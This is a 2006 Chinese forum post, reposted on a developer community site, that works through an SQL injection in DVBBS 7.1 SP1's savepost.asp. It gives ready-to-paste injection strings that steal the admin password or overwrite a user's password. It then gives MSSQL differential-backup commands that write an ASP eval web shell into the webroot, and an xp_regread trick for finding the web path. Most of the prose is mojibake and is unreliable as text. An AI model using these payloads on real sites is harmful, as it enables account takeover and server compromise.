dvbbs7.1sp1最新漏洞的研究和利用-阿里云开发者社区

dvbbs7.1sp1最新漏洞的研究和利用

2006-06-05 1108

版权

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： [怪狗] 发表于2006-05-12 00:02 ...

[ 怪狗] 发表于2006-05-12 00:02

å¨ç½è®ºå(DVBBS 7.1.0 SP1)Savepost.aspåå¨ä¸¥éæ¼æ´10-May-06
åç°:Bug.Center.Team
ä¸¥éç¨åº¦ï¼ä¸¥é
åååç§°ï¼å¨ç½è®ºå(DVBBS)
ç¨åºçæ¬ï¼DVBBS 7.1.0 SP1

æ¼æ´åæï¼
å ä¸ºç¨åºå¨savepost.aspæä»¶ä¸åéè¿æ»¤ä¸ä¸¥,å¯¼è´æ°æ®åºå¤çäº§çæ¼æ´,å¯ä»¥åå¾è®ºåæææéä»¥åwebshellãå·²ç»æäº¤å®æ¹å®¡æ ¸ï¼å¹¶éè¿ç¡®è®¤ï¼è¡¥ä¸å·²ç»å¬å¸

ååè¡¥ä¸ï¼
http://bbs.dvbbs.net/dispbbs.asp?boardID=8&ID=1187367&page=1

çå°ä¸é¢ï¼
ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼
If Not IsNumeric(Buy_VIPType) Then Buy_VIPType = 0
Â Â If Buy_UserList<>"" Then Buy_UserList = Replace(Replace(Replace(Buy_UserList,"|||",""),"@@@",""),"$PayMoney","")
Â Â ToolsBuyUser = "0@@@"&Buy_Orders&"@@@"&Buy_VIPType&"@@@"&Buy_UserList&"|||$PayMoney|||"
Â Â GetMoneyType = 3
Â Â 'UseTools = ToolsInfo(4)
ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼

åæä¸çï¼
Public Sub Insert_To_Announce()
'æå¥åå¤è¡¨
DIM UbblistBody
UbblistBody = Content
UbblistBody = Ubblist(Content)
SQL="insert into "&TotalUseTable&"(Boardid,ParentID,username,topic,body,DateAndTime,length,RootID,layer,orders,ip,Expression,locktopic,signflag,emailflag,isbest,PostUserID,isupload,IsAudit,Ubblist,GetMoney,UseTools,PostBuyUser,GetMoneyType) values ("&Dvbbs.boardid&","&ParentID&",'"&username&"','"&topic&"','"&Content&"','"&DateTimeStr&"','"&Dvbbs.strlength(Content)&"',"&RootID&","&ilayer&","&iorders&",'"&Dvbbs.UserTrueIP&"','"&Expression(1)&"',"&locktopic&","&signflag&","&mailflag&",0,"&Dvbbs.userid&","&ihaveupfile&","&IsAudit&",'"&UbblistBody&"',"&ToMoney&",'"&UseTools&"','"&ToolsBuyUser&"',"&GetMoneyType&")"
Dvbbs.Execute(sql)

å¯ä»¥çå°Buy_UserListè¿ä¸ªåéè¿æ»¤æé®é¢ï¼åµåµï¼è¿ä¸ªåéåå¯¼è´ToolsBuyUserè¿ä¸ªåéæé®é¢ãçç¡®æ¯å¯ä»¥æ³¨å°ï¼åµåµã
å¨æè¿å¤´æ¥çè¡¥ä¸éé¢ï¼
insertéé¢æä¿®è¡¥ï¼&dvbbs.checkstr(ToolsBuyUser)&"
çæ¥åºè¯¥æ¯è¿ä¸ªå°æ¹äºã
å©ç¨èµ·æ¥æå¥½æ¯sqlçæ¬ï¼å¯ä»¥updataæ¹ç®¡çåå¯ç ï¼æèå·®å¼å¤ä»½å¾shellã
å©ç¨åæ³åï¼åæ³¨åä¸ä¸ªidï¼æ¾ä¸ªçé¢åå¸åï¼
å¸ååå®¹ä¸é¢æä¸ªéæ©å¸åç±»åã
éæ©ï¼ï¼ï¼è®ºåäº¤æå¸è®¾ç½®ã
ä¸é¢æ¯è¡¨ååå®¹ã

çæºä»£ç ï¼
ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼

éå¸æ°éï¼

ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼ï¼
å°±æ¯è¿ä¸ªå°æ¹äºï¼hohoã
ä¸é¢æä¸ªâå¯è´ä¹°ååéå¶âï¼éé¢å°±å¡«åï¼
xjy111',0);update/**/Dv_User/**/set/**/UserEmail=(select[Password]from/**/Dv_admin/**/where[Username]='yellowcat')/**/where[UserName]='qq156544632';--

æäº¤æåã
ççæçEmailã
ææ»ï¼å±ç¶æäºç©ºç½ãä¸ç¥éä¸ºä»ä¹åã
æ¥ç¹ç´æ¥çï¼

coolidea|||123',0);update/**/Dv_User/**/set/**/UserPassword='469e80d32c0559f8'/**/where[UserName]='qq156544632';--
è¿åå¥½äºï¼åéåºï¼ç¨admin888è¿ä¸ªå¯ç ç´æ¥æåç»å½ã
å¥½äºï¼è¯å¥æ²¡æé®é¢ï¼å¤§å®¶ç°å¨å¯ä»¥èªç±åæ¥ï¼ä¼åå·¥å·çï¼å§delphiä»ä¹çæ¬åºæ¥ã
ç´æ¥æ¹ç®¡çåçå¯ç è¿åå°ï¼å¯ä»¥æ¢å¤æ°æ®åºçåæ³å¾å°shellï¼åèangelçæç« ï¼dvbbs7.1sqlçæ¬ä¾ç¶å¯ä»¥å§ï¼
æèå·®å¼å¤ä»½ï¼åå°å¯ä»¥çå°webç»å¯¹è·¯å¾ï¼ï¼

create table aspshell (str image);

declare @a sysname select @a=db_name() backup database @a to disk='D:/wwwroot/dvbbs7sp1/wwwroot/qq156544632.bak;

insert into aspshell values(0x3C256576616C20726571756573742822232229253E);
declare @a sysname select @a=db_name() backup database @a to disk='D:/wwwroot/dvbbs7sp1/wwwroot/qq156544632.asp' with differential;

drop table aspshell;

å¦å¤ä¸ç§å¾å°webç»å¯¹è·¯å¾åæ³(ä»èä¸æ¬ é±åå¼é£éçå°ç)
create table regread(a varchar(255),b varchar(255));
ï¼å»ºç«ä¸ä¸ªä¸´æ¶è¡¨ï¼åæ¾è¯»åå°çä¿¡æ¯ï¼
insert regread exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM/CONTROLSet001/Services/W3SVC/Parameters/Virtual Roots', '/'
ï¼ä½¿ç¨xp_regreadè¿ä¸ªå½æ°è¯»åæ³¨åè¡¨ä¿¡æ¯å¾å°èæç®å½è·¯å¾ï¼å¹¶åå¥ä¸´æ¶è¡¨ä¸ï¼
update dv_boke_user set boketitle=(select top 1 b from regread) where bokename='admin'

è³äºacessçæ¬æ²¡æç ç©¶ã

[è³äºå·¥å·ï¼å®å¨æ²¡å¿è¦åï¼å ä¸ºå©ç¨èµ·æ¥å¾ç®åï¼ææå©ç¨çæ³¨å¥è¯å¥å¤å¶ç²è´´ä¸ä¸å°±å¯ä»¥äºãå¯¹äºå¨ç½SQLçï¼ææè§å±å®³æ¯å½åçä¸ä¼ æ¼æ´è¿è¦ä¸¥éï¼å ä¸ºæä½èµ·æ¥å¾æ¹ä¾¿ãå¸æå¤§å®¶æ¬çä¸ç§å¦ä¹ ææ¯çå¿æï¼ä¸è¦å¯¹åå¨æ¼æ´çç«ç¹å®æ½ç ´åæ»å»ï¼ï¼ï¼ââ
http://aliwy.77169.com

dvbbs7.1sp1最新漏洞的研究和利用

热门文章

最新文章

相关电子书

热门

活动广场

任务中心

开发者评测

高校计划

乘风者计划

训练营

阿里云MVP

话题

直播

下载

镜像站

技术资料

插件

dvbbs7.1sp1最新漏洞的研究和利用

热门文章

最新文章

相关电子书